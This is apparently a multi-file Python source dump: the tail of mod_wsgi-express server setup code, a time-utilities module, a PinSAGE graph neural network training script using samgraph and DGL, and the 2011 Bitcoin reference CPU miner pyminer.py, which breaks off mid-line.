options['url'] = 'http://%s/' % host else: options['url'] = 'http://%s:%s/' % (host, options['port']) if options['https_port'] == 443: options['https_url'] = 'https://%s/' % host elif options['https_port'] is not None: options['https_url'] = 'https://%s:%s/' % (host, options['https_port']) else: options['https_url'] = None if options['destroy_interpreter']: options['httpd_arguments_list'].append('-DDESTROY_INTERPRETER') if options['embedded_mode']: options['httpd_arguments_list'].append('-DEMBEDDED_MODE') options['disable_reloading'] = True if any((options['enable_debugger'], options['enable_coverage'], options['enable_profiler'], options['enable_recorder'], options['enable_gdb'])): options['debug_mode'] = True if options['debug_mode']: options['httpd_arguments_list'].append('-DONE_PROCESS') if options['debug_mode']: if options['enable_coverage']: if not options['coverage_directory']: options['coverage_directory'] = posixpath.join( options['server_root'], 'htmlcov') else: options['coverage_directory'] = posixpath.abspath( options['coverage_directory']) try: os.mkdir(options['coverage_directory']) except Exception: pass if options['enable_profiler']: if not options['profiler_directory']: options['profiler_directory'] = posixpath.join( options['server_root'], 'pstats') else: options['profiler_directory'] = posixpath.abspath( options['profiler_directory']) try: 
os.mkdir(options['profiler_directory']) except Exception: pass if options['enable_recorder']: if not options['recorder_directory']: options['recorder_directory'] = posixpath.join( options['server_root'], 'archive') else: options['recorder_directory'] = posixpath.abspath( options['recorder_directory']) try: os.mkdir(options['recorder_directory']) except Exception: pass else: options['enable_debugger'] = False options['enable_coverage'] = False options['enable_profiler'] = False options['enable_recorder'] = False options['enable_gdb'] = False options['parent_domain'] = 'unspecified' if options['server_name']: options['httpd_arguments_list'].append('-DMOD_WSGI_VIRTUAL_HOST') if options['server_name'].lower().startswith('www.'): options['httpd_arguments_list'].append('-DMOD_WSGI_REDIRECT_WWW') options['parent_domain'] = options['server_name'][4:] if options['http2']: options['httpd_arguments_list'].append('-DMOD_WSGI_WITH_HTTP2') if (options['https_port'] and options['ssl_certificate_file'] and options['ssl_certificate_key_file']): options['httpd_arguments_list'].append('-DMOD_WSGI_WITH_HTTPS') if options['ssl_ca_certificate_file']: options['httpd_arguments_list'].append('-DMOD_WSGI_VERIFY_CLIENT') if options['ssl_certificate_chain_file']: options['httpd_arguments_list'].append('-DMOD_WSGI_CERTIFICATE_CHAIN') if options['ssl_environment']: options['httpd_arguments_list'].append('-DMOD_WSGI_SSL_ENVIRONMENT') if options['https_only']: options['httpd_arguments_list'].append('-DMOD_WSGI_HTTPS_ONLY') if options['hsts_policy']: options['httpd_arguments_list'].append('-DMOD_WSGI_HSTS_POLICY') if options['server_aliases']: options['httpd_arguments_list'].append('-DMOD_WSGI_SERVER_ALIAS') options['server_aliases'] = ' '.join(options['server_aliases']) if options['allow_localhost']: options['httpd_arguments_list'].append('-DMOD_WSGI_ALLOW_LOCALHOST') if options['application_type'] == 'static': options['httpd_arguments_list'].append('-DMOD_WSGI_STATIC_ONLY') if options['enable_sendfile']: options['httpd_arguments_list'].append('-DMOD_WSGI_ENABLE_SENDFILE') if options['server_metrics']: options['httpd_arguments_list'].append('-DMOD_WSGI_SERVER_METRICS') if options['server_status']: options['httpd_arguments_list'].append('-DMOD_WSGI_SERVER_METRICS') options['httpd_arguments_list'].append('-DMOD_WSGI_SERVER_STATUS') if options['directory_index']: options['httpd_arguments_list'].append('-DMOD_WSGI_DIRECTORY_INDEX') if options['directory_listing']: options['httpd_arguments_list'].append('-DMOD_WSGI_DIRECTORY_LISTING') if options['error_log_format']: options['httpd_arguments_list'].append('-DMOD_WSGI_ERROR_LOG_FORMAT') if options['access_log']: options['httpd_arguments_list'].append('-DMOD_WSGI_ACCESS_LOG') if options['rotate_logs']: options['httpd_arguments_list'].append('-DMOD_WSGI_ROTATE_LOGS') if options['keep_alive'] != 0: options['httpd_arguments_list'].append('-DMOD_WSGI_KEEP_ALIVE') if options['compress_responses'] != 0: options['httpd_arguments_list'].append('-DMOD_WSGI_COMPRESS_RESPONSES') if options['multiprocess']: options['httpd_arguments_list'].append('-DMOD_WSGI_MULTIPROCESS') if options['listener_host']: options['httpd_arguments_list'].append('-DMOD_WSGI_WITH_LISTENER_HOST') if options['error_override']: options['httpd_arguments_list'].append('-DMOD_WSGI_ERROR_OVERRIDE') if options['host_access_script']: options['httpd_arguments_list'].append('-DMOD_WSGI_HOST_ACCESS') if options['auth_user_script']: options['httpd_arguments_list'].append('-DMOD_WSGI_AUTH_USER') if options['auth_group_script']: 
options['httpd_arguments_list'].append('-DMOD_WSGI_AUTH_GROUP') if options['chunked_request']: options['httpd_arguments_list'].append('-DMOD_WSGI_CHUNKED_REQUEST') if options['with_php5']: options['httpd_arguments_list'].append('-DMOD_WSGI_WITH_PHP5') if options['proxy_mount_points'] or options['proxy_virtual_hosts']: options['httpd_arguments_list'].append('-DMOD_WSGI_WITH_PROXY') if options['trusted_proxy_headers']: options['httpd_arguments_list'].append('-DMOD_WSGI_WITH_PROXY_HEADERS') if options['trusted_proxies']: options['httpd_arguments_list'].append('-DMOD_WSGI_WITH_TRUSTED_PROXIES') if options['python_path']: options['httpd_arguments_list'].append('-DMOD_WSGI_WITH_PYTHON_PATH') if options['socket_prefix']: options['httpd_arguments_list'].append('-DMOD_WSGI_WITH_SOCKET_PREFIX') if options['disable_reloading']: options['httpd_arguments_list'].append('-DMOD_WSGI_DISABLE_RELOADING') if options['with_cgi']: if os.path.exists(posixpath.join(options['modules_directory'], 'mod_cgid.so')): options['httpd_arguments_list'].append('-DMOD_WSGI_CGID_SCRIPT') else: options['httpd_arguments_list'].append('-DMOD_WSGI_CGI_SCRIPT') options['httpd_arguments_list'].extend( _mpm_module_defines(options['modules_directory'], options['server_mpm_variables'])) options['python_executable'] = sys.executable options['shlibpath_var'] = apxs_config.SHLIBPATH_VAR options['shlibpath'] = apxs_config.SHLIBPATH if _py_dylib: options['httpd_arguments_list'].append('-DMOD_WSGI_LOAD_PYTHON_DYLIB') options['python_dylib'] = _py_dylib options['httpd_arguments'] = '-f %s %s' % (options['httpd_conf'], ' '.join(options['httpd_arguments_list'])) generate_wsgi_handler_script(options) if options['with_newrelic_platform']: generate_server_metrics_script(options) print('Server URL :', options['url']) if options['https_url']: print('Server URL (HTTPS) :', options['https_url']) if options['server_status']: print('Server Status :', '%sserver-status' % options['url']) print('Server Root :', options['server_root']) print('Server Conf :', options['httpd_conf']) print('Error Log File : %s (%s)' % (options['error_log_file'], options['log_level'])) if options['access_log']: print('Access Log File :', options['access_log_file']) if options['startup_log']: print('Startup Log File :', options['startup_log_file']) if options['enable_coverage']: print('Coverage Output :', posixpath.join( options['coverage_directory'], 'index.html')) if options['enable_profiler']: print('Profiler Output :', options['profiler_directory']) if options['enable_recorder']: print('Recorder Output :', options['recorder_directory']) if options['rewrite_rules']: print('Rewrite Rules :', options['rewrite_rules']) if os.name != 'nt': if options['envvars_script']: print('Environ Variables :', options['envvars_script']) if command == 'setup-server' or options['setup_only']: if not options['rewrite_rules']: print('Rewrite Rules :', options['server_root'] + '/rewrite.conf') if os.name != 'nt': if not options['envvars_script']: print('Environ Variables :', options['server_root'] + '/envvars') print('Control Script :', options['server_root'] + '/apachectl') if options['debug_mode']: print('Operating Mode : debug') elif options['embedded_mode']: print('Operating Mode : embedded') else: print('Operating Mode : daemon') if options['processes'] == 1: print('Request Capacity : %s (%s process * %s threads)' % ( options['processes']*options['threads'], options['processes'], options['threads'])) else: print('Request Capacity : %s (%s processes * %s threads)' % ( 
options['processes']*options['threads'], options['processes'], options['threads'])) if not options['debug_mode'] and not options['embedded_mode']: print('Request Timeout : %s (seconds)' % options['request_timeout']) if options['startup_timeout']: print('Startup Timeout : %s (seconds)' % options['startup_timeout']) print('Queue Backlog : %s (connections)' % options['daemon_backlog']) print('Queue Timeout : %s (seconds)' % options['queue_timeout']) print('Server Capacity : %s (event/worker), %s (prefork)' % ( options['worker_max_clients'], options['prefork_max_clients'])) print('Server Backlog : %s (connections)' % options['server_backlog']) print('Locale Setting :', options['locale']) sys.stdout.flush() if not options['rewrite_rules']: options['rewrite_rules'] = options['server_root'] + '/rewrite.conf' if not os.path.isfile(options['rewrite_rules']): with open(options['rewrite_rules'], 'w') as fp: pass generate_apache_config(options) if os.name != 'nt': generate_control_scripts(options) return options def cmd_start_server(params): formatter = optparse.IndentedHelpFormatter() formatter.set_long_opt_delimiter(' ') usage = '%prog start-server script [options]' parser = optparse.OptionParser(usage=usage, option_list=option_list, formatter=formatter) (options, args) = parser.parse_args(params) config = _cmd_setup_server('start-server', args, vars(options)) if config['setup_only']: return if os.name == 'nt': print() print("WARNING: The ability to use the start-server option on Windows") print("WARNING: is highly experimental and various things don't quite") print("WARNING: work properly. If you understand a lot about using") print("WARNING: Python on Windows and Windows programming in general,") print("WARNING: and would like to help to get it working properly, then") print("WARNING: you can ask about Windows support for the start-server") print("WARNING: option on the mod_wsgi mailing list.") print() executable = config['httpd_executable'] environ = copy.deepcopy(os.environ) environ['MOD_WSGI_MODULES_DIRECTORY'] = config['modules_directory'] httpd_arguments = list(config['httpd_arguments_list']) httpd_arguments.extend(['-f', config['httpd_conf']]) httpd_arguments.extend(['-DONE_PROCESS']) os.environ['MOD_WSGI_MODULES_DIRECTORY'] = config['modules_directory'] subprocess.call([executable]+httpd_arguments) sys.exit(0) else: executable = posixpath.join(config['server_root'], 'apachectl') if sys.stdout.isatty(): process = None def handler(signum, frame): if process is None: sys.exit(1) else: if signum not in [signal.SIGWINCH]: os.kill(process.pid, signum) signal.signal(signal.SIGINT, handler) signal.signal(signal.SIGTERM, handler) signal.signal(signal.SIGHUP, handler) signal.signal(signal.SIGUSR1, handler) signal.signal(signal.SIGWINCH, handler) process = subprocess.Popen([executable, 'start', '-DFOREGROUND'], preexec_fn=os.setpgrp) process.wait() else: os.execl(executable, executable, 'start', '-DFOREGROUND') def cmd_module_config(params): formatter = optparse.IndentedHelpFormatter() formatter.set_long_opt_delimiter(' ') usage = '%prog module-config' parser = optparse.OptionParser(usage=usage, formatter=formatter) (options, args) = parser.parse_args(params) if len(args) != 0: parser.error('Incorrect number of arguments.') if os.name == 'nt': real_prefix = getattr(sys, 'real_prefix', None) base_prefix = getattr(sys, 'base_prefix', None) real_prefix = real_prefix or base_prefix or sys.prefix library_version = sysconfig.get_config_var('VERSION') library_name = 'python%s.dll' % library_version 
library_path = posixpath.join(real_prefix, library_name) if not os.path.exists(library_path): library_name = 'python%s.dll' % library_version[0] library_path = posixpath.join(real_prefix, 'DLLs', library_name) if not os.path.exists(library_path): library_path = None if library_path: library_path = posixpath.normpath(library_path) library_path = library_path.replace('\\', '/') print('LoadFile "%s"' % library_path) module_path = where() module_path = module_path.replace('\\', '/') prefix = sys.prefix prefix = posixpath.normpath(prefix) prefix = prefix.replace('\\', '/') print('LoadModule wsgi_module "%s"' % module_path) print('WSGIPythonHome "%s"' % prefix) else: module_path = where() prefix = sys.prefix prefix = posixpath.normpath(prefix) if _py_dylib: print('LoadFile "%s"' % _py_dylib) print('LoadModule wsgi_module "%s"' % module_path) print('WSGIPythonHome "%s"' % prefix) def cmd_install_module(params): formatter = optparse.IndentedHelpFormatter() formatter.set_long_opt_delimiter(' ') usage = '%prog install-module [options]' parser = optparse.OptionParser(usage=usage, formatter=formatter) parser.add_option('--modules-directory', metavar='DIRECTORY', default=apxs_config.LIBEXECDIR) (options, args) = parser.parse_args(params) if len(args) != 0: parser.error('Incorrect number of arguments.') target = posixpath.abspath(posixpath.join(options.modules_directory, posixpath.basename(MOD_WSGI_SO))) shutil.copyfile(where(), target) if _py_dylib: print('LoadFile "%s"' % _py_dylib) print('LoadModule wsgi_module "%s"' % target) print('WSGIPythonHome "%s"' % posixpath.normpath(sys.prefix)) def cmd_module_location(params): formatter = optparse.IndentedHelpFormatter() formatter.set_long_opt_delimiter(' ') usage = '%prog module-location' parser = optparse.OptionParser(usage=usage, formatter=formatter) (options, args) = parser.parse_args(params) if len(args) != 0: parser.error('Incorrect number of arguments.') print(where()) if os.name == 'nt': main_usage=""" %prog command [params] Commands: module-config module-location """ else: main_usage=""" %prog command [params] Commands: install-module module-config module-location setup-server start-server """ def main(): parser = optparse.OptionParser(main_usage.strip()) args = sys.argv[1:] if not args: parser.error('No command was specified.') command = args.pop(0) args = [os.path.expandvars(arg) for arg in args] if os.name == 'nt': if command == 'module-config': cmd_module_config(args) elif command == 'module-location': cmd_module_location(args) elif command == 'start-server': cmd_start_server(args) else: parser.error('Invalid command was specified.') else: if command == 'install-module': cmd_install_module(args) elif command == 'module-config': cmd_module_config(args) elif command == 'module-location': cmd_module_location(args) elif command == 'setup-server': cmd_setup_server(args) elif command == 'start-server': cmd_start_server(args) else: parser.error('Invalid command was specified.') def start(*args): cmd_start_server(list(args)) if __name__ == '__main__': main()
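# Worked example of the capacity arithmetic above (hand-derived from this file's own
# formulas, assuming hypothetical inputs processes=2, threads=5 and no --max-clients
# override; these numbers are illustrative, not official mod_wsgi defaults):
#
#   max_clients              = 10 + max(10, int(1.5 * 2 * 5))   = 25
#   worker_threads_per_child = int(25 / (int(25 / 20) + 1))     = 12   (since 25 > 20)
#   worker_server_limit      = ceil(25 / 12)                    = 3
#   worker_max_clients       = 3 * 12                           = 36
#   worker_start_servers     = max(1, int(0.2 * 3))             = 1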
utilities.py
import datetime import os import threading import time from calendar import timegm TIME_ZONE = 'Europe/Berlin' SECONDS_IN_A_MINUTE = 60 SECONDS_IN_AN_HOUR = SECONDS_IN_A_MINUTE * 60 SECONDS_IN_A_DAY = SECONDS_IN_AN_HOUR * 24 SECONDS_IN_A_WEEK = SECONDS_IN_A_DAY * 7 DAILY = 'daily' WEEKLY = 'weekly' DOY_YEAR_MILITARY = '%j%Y%H%M' DAY_MILITARY = '%a:%H%M' DOY_YEAR = '%j%Y' DOY = '%j' YEAR = '%Y' MILITARY_TIME = '%H%M' FMT_TIME = '%Y-%m-%d %H:%M' FMT_TIME_FILE = '%Y-%m-%d-%H-%M' def decorator(argument): def real_decorator(function): def wrapper(*args, **kwargs): print('1') print(argument) result = function(*args, **kwargs) print(2) return result return wrapper return real_decorator def set_tz(): os.environ['TZ'] = TIME_ZONE def log_time(do_print: bool = False): def real_log_time(orig_func): def wrapper(*args, **kwargs): start_time = time.time() result = orig_func(*args, **kwargs) time_lapsed = time.time() - start_time if do_print: print('{} completed {} seconds.'.format(orig_func.__name__.upper(), round(time_lapsed, 5))) return result return wrapper return real_log_time def new_thread(funct: object) -> object: def wrapper(*args, **kwargs): print(funct.__name__.upper(), 'args:', args, 'kwargs:', kwargs) thr = threading.Thread(target=funct, args=args) thr.daemon = True return thr.start() return wrapper def epoch(epoch=None, future_in_seconds: int = 0, custom_hhmm: int = None): if epoch is None: epoch = int(time.time()) if custom_hhmm is None: return int(time.time()) + future_in_seconds else: custom_timestamp = datetime.datetime.fromtimestamp( epoch + future_in_seconds).strftime( DOY_YEAR_MILITARY.replace('%H%M', str(custom_hhmm).zfill(4))) utc_time = time.strptime(custom_timestamp, DOY_YEAR_MILITARY) epoch_time = timegm(utc_time) return int(epoch_time) def epoch_to_custom_date(fmt: str, _epoch: int = None): if _epoch is None: _epoch = epoch() return datetime.datetime.fromtimestamp(_epoch).strftime(fmt) def get_week_number(): now = datetime.datetime.now() return datetime.date(now.year, now.month, now.day).isocalendar()[1] set_tz()
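# Hedged usage sketch, not part of the original module: `slow_job` is a hypothetical
# function added only to illustrate the log_time decorator defined above.
if __name__ == '__main__':
    @log_time(do_print=True)
    def slow_job(seconds):
        time.sleep(seconds)

    slow_job(2)  # prints something like "SLOW_JOB completed 2.00012 seconds."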
train_pinsage.py
import argparse import time import torch import torch.nn as nn import torch.nn.functional as F import torch.optim as optim import numpy as np import dgl.function as fn from dgl.nn.pytorch import GraphConv import dgl.multiprocessing as mp from torch.nn.parallel import DistributedDataParallel import sys import os import datetime import samgraph.torch as sam from common_config import * """ We have made the following modification(or say, simplification) on PinSAGE, because we only want to focus on the core algorithm of PinSAGE: 1. we modify PinSAGE to make it be able to be trained on homogenous graph. 2. we use cross-entropy loss instead of max-margin ranking loss describe in the paper. """ class WeightedSAGEConv(nn.Module): def __init__(self, input_dims, hidden_dims, output_dims, dropout, act=F.relu): super().__init__() self.act = act self.Q = nn.Linear(input_dims, hidden_dims) self.W = nn.Linear(input_dims + hidden_dims, output_dims) self.reset_parameters() self.dropout = nn.Dropout(dropout) def reset_parameters(self): gain = nn.init.calculate_gain('relu') nn.init.xavier_uniform_(self.Q.weight, gain=gain) nn.init.xavier_uniform_(self.W.weight, gain=gain) nn.init.constant_(self.Q.bias, 0) nn.init.constant_(self.W.bias, 0) def forward(self, g, h, weights): """ g : graph h : node features weights : scalar edge weights """ h_src, h_dst = h with g.local_scope(): g.srcdata['n'] = self.act(self.Q(self.dropout(h_src))) g.edata['w'] = weights.float() g.update_all(fn.u_mul_e('n', 'w', 'm'), fn.sum('m', 'n')) g.update_all(fn.copy_e('w', 'm'), fn.sum('m', 'ws')) n = g.dstdata['n'] ws = g.dstdata['ws'].unsqueeze(1).clamp(min=1) z = self.act(self.W(self.dropout(torch.cat([n / ws, h_dst], 1)))) z_norm = z.norm(2, 1, keepdim=True) z_norm = torch.where( z_norm == 0, torch.tensor(1.).to(z_norm), z_norm) z = z / z_norm return z class PinSAGE(nn.Module): def __init__(self, in_feats, n_hidden, n_classes, n_layers, activation, dropout): super().__init__() self.n_layers = n_layers self.n_hidden = n_hidden self.n_classes = n_classes self.layers = nn.ModuleList() self.layers.append(WeightedSAGEConv( in_feats, n_hidden, n_hidden, dropout, activation)) for _ in range(1, n_layers - 1): self.layers.append(WeightedSAGEConv( n_hidden, n_hidden, n_hidden, dropout, activation)) self.layers.append(WeightedSAGEConv( n_hidden, n_hidden, n_classes, dropout, activation)) def forward(self, blocks, h): for layer, block in zip(self.layers, blocks): h_dst = h[:block.number_of_nodes('DST/' + block.ntypes[0])] h = layer(block, (h, h_dst), block.edata['weights']) return h def parse_args(default_run_config): argparser = argparse.ArgumentParser("PinSAGE Training") add_common_arguments(argparser, default_run_config) argparser.add_argument('--random-walk-length', type=int, default=default_run_config['random_walk_length']) argparser.add_argument('--random-walk-restart-prob', type=float, default=default_run_config['random_walk_restart_prob']) argparser.add_argument('--num-random-walk', type=int, default=default_run_config['num_random_walk']) argparser.add_argument('--num-neighbor', type=int, default=default_run_config['num_neighbor']) argparser.add_argument('--num-layer', type=int, default=default_run_config['num_layer']) argparser.add_argument( '--lr', type=float, default=default_run_config['lr']) argparser.add_argument('--dropout', type=float, default=default_run_config['dropout']) return vars(argparser.parse_args()) def get_run_config(): run_config = {} run_config.update(get_default_common_config(run_mode=RunMode.SGNN)) 
run_config['sample_type'] = 'random_walk' run_config['random_walk_length'] = 3 run_config['random_walk_restart_prob'] = 0.5 run_config['num_random_walk'] = 4 run_config['num_neighbor'] = 5 run_config['num_layer'] = 3 run_config['lr'] = 0.003 run_config['dropout'] = 0.5 run_config.update(parse_args(run_config)) process_common_config(run_config) assert(run_config['arch'] == 'arch6') assert(run_config['sample_type'] == 'random_walk') print_run_config(run_config) if run_config['validate_configs']: sys.exit() return run_config def run_init(run_config): sam.config(run_config) sam.data_init() if run_config['validate_configs']: sys.exit() def run(worker_id, run_config): num_worker = run_config['num_worker'] global_barrier = run_config['global_barrier'] ctx = run_config['workers'][worker_id] device = torch.device(ctx) print('[Worker {:d}/{:d}] Started with PID {:d}({:s})'.format( worker_id, num_worker, os.getpid(), torch.cuda.get_device_name(ctx))) sam.sample_init(worker_id, ctx) sam.train_init(worker_id, ctx) if num_worker > 1: dist_init_method = 'tcp://{master_ip}:{master_port}'.format( master_ip='127.0.0.1', master_port='12345') world_size = num_worker torch.distributed.init_process_group(backend="nccl", init_method=dist_init_method, world_size=world_size, rank=worker_id, timeout=datetime.timedelta(seconds=get_default_timeout())) in_feat = sam.feat_dim() num_class = sam.num_class() num_layer = run_config['num_layer'] model = PinSAGE(in_feat, run_config['num_hidden'], num_class, num_layer, F.relu, run_config['dropout']) model = model.to(device) if num_worker > 1: model = DistributedDataParallel( model, device_ids=[device], output_device=device) loss_fcn = nn.CrossEntropyLoss() loss_fcn = loss_fcn.to(device) optimizer = optim.Adam( model.parameters(), lr=run_config['lr']) num_epoch = sam.num_epoch() num_step = sam.num_local_step() model.train() epoch_sample_total_times = [] epoch_sample_times = [] epoch_get_cache_miss_index_times = [] epoch_copy_times = [] epoch_convert_times = [] epoch_train_times = [] epoch_total_times_python = [] epoch_train_total_times_profiler = [] epoch_cache_hit_rates = [] copy_times = [] convert_times = [] train_times = [] total_times = [] # run start barrier global_barrier.wait() print('[Worker {:d}] run for {:d} epochs with {:d} steps'.format( worker_id, num_epoch, num_step)) run_start = time.time() for epoch in range(num_epoch): # epoch start barrier global_barrier.wait() tic = time.time() for step in range(worker_id, num_step * num_worker, num_worker): t0 = time.time() sam.sample_once() batch_key = sam.get_next_batch() t1 = time.time() blocks, batch_input, batch_label = sam.get_dgl_blocks_with_weights( batch_key, num_layer) t2 = time.time() # Compute loss and prediction batch_pred = model(blocks, batch_input) loss = loss_fcn(batch_pred, batch_label) optimizer.zero_grad() loss.backward() optimizer.step() event_sync() batch_input = None batch_label = None blocks = None if num_worker > 1: torch.distributed.barrier() t3 = time.time() copy_time = sam.get_log_step_value(epoch, step, sam.kLogL1CopyTime) convert_time = t2 - t1 train_time = t3 - t2 total_time = t3 - t1 sam.log_step(epoch, step, sam.kLogL1TrainTime, train_time) sam.log_step(epoch, step, sam.kLogL1ConvertTime, convert_time) sam.log_epoch_add(epoch, sam.kLogEpochConvertTime, convert_time) sam.log_epoch_add(epoch, sam.kLogEpochTrainTime, train_time) sam.log_epoch_add(epoch, sam.kLogEpochTotalTime, total_time) copy_times.append(copy_time) convert_times.append(convert_time) train_times.append(train_time) 
total_times.append(total_time) sam.report_step(epoch, step) event_sync() # sync the train workers if num_worker > 1: torch.distributed.barrier() toc = time.time() epoch_total_times_python.append(toc - tic) # epoch end barrier global_barrier.wait() feat_nbytes = sam.get_log_epoch_value( epoch, sam.kLogEpochFeatureBytes) miss_nbytes = sam.get_log_epoch_value( epoch, sam.kLogEpochMissBytes) epoch_cache_hit_rates.append( (feat_nbytes - miss_nbytes) / feat_nbytes) epoch_sample_total_times.append( sam.get_log_epoch_value(epoch, sam.kLogEpochSampleTotalTime) ) epoch_sample_times.append( sam.get_log_epoch_value(epoch, sam.kLogEpochSampleTime) ) epoch_get_cache_miss_index_times.append( sam.get_log_epoch_value( epoch, sam.KLogEpochSampleGetCacheMissIndexTime) ) epoch_copy_times.append( sam.get_log_epoch_value(epoch, sam.kLogEpochCopyTime)) epoch_convert_times.append( sam.get_log_epoch_value(epoch, sam.kLogEpochConvertTime)) epoch_train_times.append( sam.get_log_epoch_value(epoch, sam.kLogEpochTrainTime)) epoch_train_total_times_profiler.append( sam.get_log_epoch_value(epoch, sam.kLogEpochTotalTime)) if worker_id == 0: print('Epoch {:05d} | Epoch Time {:.4f} | Sample {:.4f} | Copy {:.4f} | Total Train(Profiler) {:.4f}'.format( epoch, epoch_total_times_python[-1], epoch_sample_total_times[-1], epoch_copy_times[-1], epoch_train_total_times_profiler[-1])) # sync the train workers if num_worker > 1: torch.distributed.barrier() # run end barrier global_barrier.wait() run_end = time.time() print('[Train Worker {:d}] Avg Epoch {:.4f} | Sample {:.4f} | Copy {:.4f} | Train Total (Profiler) {:.4f}'.format( worker_id, np.mean(epoch_total_times_python[1:]), np.mean(epoch_sample_total_times[1:]), np.mean(epoch_copy_times[1:]), np.mean(epoch_train_total_times_profiler[1:]))) global_barrier.wait() # barrier for pretty print if worker_id == 0: test_result = [] test_result.append(('sample_time', np.mean(epoch_sample_times[1:]))) test_result.append(('get_cache_miss_index_time', np.mean( epoch_get_cache_miss_index_times[1:]))) test_result.append( ('epoch_time:sample_total', np.mean(epoch_sample_total_times[1:]))) test_result.append(('epoch_time:copy_time', np.mean(epoch_copy_times[1:]))) test_result.append(('convert_time', np.mean(epoch_convert_times[1:]))) test_result.append(('train_time', np.mean(epoch_train_times[1:]))) test_result.append(('epoch_time:train_total', np.mean( epoch_train_total_times_profiler[1:]))) test_result.append( ('cache_percentage', run_config['cache_percentage'])) test_result.append(('cache_hit_rate', np.mean( epoch_cache_hit_rates[1:]))) test_result.append( ('epoch_time:total', np.mean(epoch_total_times_python[1:]))) test_result.append(('run_time', run_end - run_start)) for k, v in test_result: print('test_result:{:}={:.2f}'.format(k, v)) # sam.dump_trace() sam.shutdown() if __name__ == '__main__': run_config = get_run_config() run_init(run_config) num_worker = run_config['num_worker'] # global barrier is used to sync all the workers run_config['global_barrier'] = mp.Barrier( num_worker, timeout=get_default_timeout()) if num_worker == 1: run(0, run_config) else: workers = [] # sample processes for worker_id in range(num_worker): p = mp.Process(target=run, args=(worker_id, run_config)) p.start() workers.append(p) ret = sam.wait_one_child() if ret != 0: for p in workers: p.kill() for p in workers: p.join() if ret != 0: sys.exit(1)
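# For reference (derived from WeightedSAGEConv.forward above, not from the PinSAGE paper;
# dropout omitted for clarity): each destination node i aggregates its sampled
# neighbours j with scalar edge weights w_ij as
#
#     n_i = sum_j w_ij * act(Q h_j)
#     z_i = act(W [ n_i / max(sum_j w_ij, 1) ; h_i ])
#     z_i = z_i / ||z_i||_2        (norms of exactly 0 are replaced by 1)
#
# so the visit counts produced by the random-walk sampler act as a weighted mean.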
pyminer.py
#!/usr/bin/python # # Copyright (c) 2011 The Bitcoin developers # Distributed under the MIT/X11 software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. # import time import json import pprint import hashlib import struct import re import base64 import httplib import sys from multiprocessing import Process ERR_SLEEP = 15 MAX_NONCE = 1000000L settings = {} pp = pprint.PrettyPrinter(indent=4) class BitcoinRPC: OBJID = 1 def __init__(self, host, port, username, password): authpair = "%s:%s" % (username, password) self.authhdr = "Basic %s" % (base64.b64encode(authpair)) self.conn = httplib.HTTPConnection(host, port, False, 30) def rpc(self, method, params=None): self.OBJID += 1 obj = { 'version' : '1.1', 'method' : method, 'id' : self.OBJID } if params is None: obj['params'] = [] else: obj['params'] = params self.conn.request('POST', '/', json.dumps(obj), { 'Authorization' : self.authhdr, 'Content-type' : 'application/json' }) resp = self.conn.getresponse() if resp is None: print "JSON-RPC: no response" return None body = resp.read() resp_obj = json.loads(body) if resp_obj is None: print "JSON-RPC: cannot JSON-decode body" return None if 'error' in resp_obj and resp_obj['error'] != None: return resp_obj['error'] if 'result' not in resp_obj: print "JSON-RPC: no result in object" return None return resp_obj['result'] def getblockcount(self): return self.rpc('getblockcount') def getwork(self, data=None): return self.rpc('getwork', data) def uint32(x): return x & 0xffffffffL def bytereverse(x): return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) | (((x) >> 8) & 0x0000ff00) | ((x) >> 24) )) def bufreverse(in_buf): out_words = [] for i in range(0, len(in_buf), 4): word = struct.unpack('@I', in_buf[i:i+4])[0] out_words.append(struct.pack('@I', bytereverse(word))) return ''.join(out_words) def wordreverse(in_buf): out_words = [] for i in range(0, len(in_buf), 4): out_words.append(in_buf[i:i+4]) out_words.reverse() return ''.join(out_words) class Miner: def __init__(self, id): self.id = id self.max_nonce = MAX_NONCE def work(self, datastr, targetstr): # decode work data hex string to binary static_data = datastr.decode('hex') static_data = bufreverse(static_data) # the first 76b of 80b do not change blk_hdr = static_data[:76] # decode 256-bit target value targetbin = targetstr.decode('hex') targetbin = targetbin[::-1] # byte-swap and dword-swap targetbin_str = targetbin.encode('hex') target = long(targetbin_str, 16) # pre-hash first 76b of block header static_hash = hashlib.sha256() static_hash.update(blk_hdr) for nonce in xrange(self.max_nonce): # encode 32-bit nonce value nonce_bin = struct.pack("<I", nonce) # hash final 4b, the nonce value hash1_o = static_hash.copy() hash1_o.update(nonce_bin) hash1 = hash1_o.digest() # sha256 hash of sha256 hash hash_o = hashlib.sha256() hash_o.update(hash1) hash = hash_o.digest() # quick test for winning solution: high 32 bits zero? 
if hash[-4:] != '\0\0\0\0': continue # convert binary hash to 256-bit Python long hash = bufreverse(hash) hash = wordreverse(hash) hash_str = hash.encode('hex') l = long(hash_str, 16) # proof-of-work test: hash < target if l < target: print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,) return (nonce + 1, nonce_bin) else: print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,) # return (nonce + 1, nonce_bin) return (nonce + 1, None) def submit_work(self, rpc, original_data, nonce_bin): nonce_bin = bufreverse(nonce_bin) nonce = nonce_bin.encode('hex') solution = original_data[:152] + nonce + original_data[160:256] param_arr = [ solution ] result = rpc.getwork(param_arr) print time.asctime(), "--> Upstream RPC result:", result def iterate(self, rpc): work = rpc.getwork() if work is None: time.sleep(ERR_SLEEP) return if 'data' not in work or 'target' not in work: time.sleep(ERR_SLEEP) return time_start = time.time() (hashes_done, nonce_bin) = self.work(work['data'], work['target']) time_end = time.time() time_diff = time_end - time_start self.max_nonce = long( (hashes_done * settings['scantime']) / time_diff) if self.max_nonce > 0xfffffffaL: self.max_nonce = 0xfffffffaL if settings['hashmeter']: print "HashMeter(%d): %d hashes, %.2f Khash/sec" % ( self.id, hashes_done, (hashes_done / 1000.0) / time_diff) if nonce_bin is not None: self.submit_work(rpc, work['data'], nonce_bin) def loop(self): rpc = BitcoinRPC(settings['host'], settings['port'], settings['rpcuser'], settings['rpcpass']) if rpc is None: return while True: self.iterate(rpc) def miner_thread(id): miner = Miner(id) miner.loop() if __name__ == '__main__': if len(sys.argv) != 2: print "Usage: pyminer.py CONFIG-FILE" sys.exit(1) f = open(sys.argv[1]) for line in f: # skip comment lines m = re.search('^\s*#', line) if m: continue # parse key=value lines m = re.search('^(\w+)\s*=\s*(\S.*)$', line) if m is None: continue settings[m.group(1)] = m.group(2) f.close() if 'host' not in settings: settings['host'] = '127.0.0.1' if 'port' not in settings: settings['port'] = 9342 if 'threads' not in settings: settings['threads'] = 1 if 'hashmeter' not in 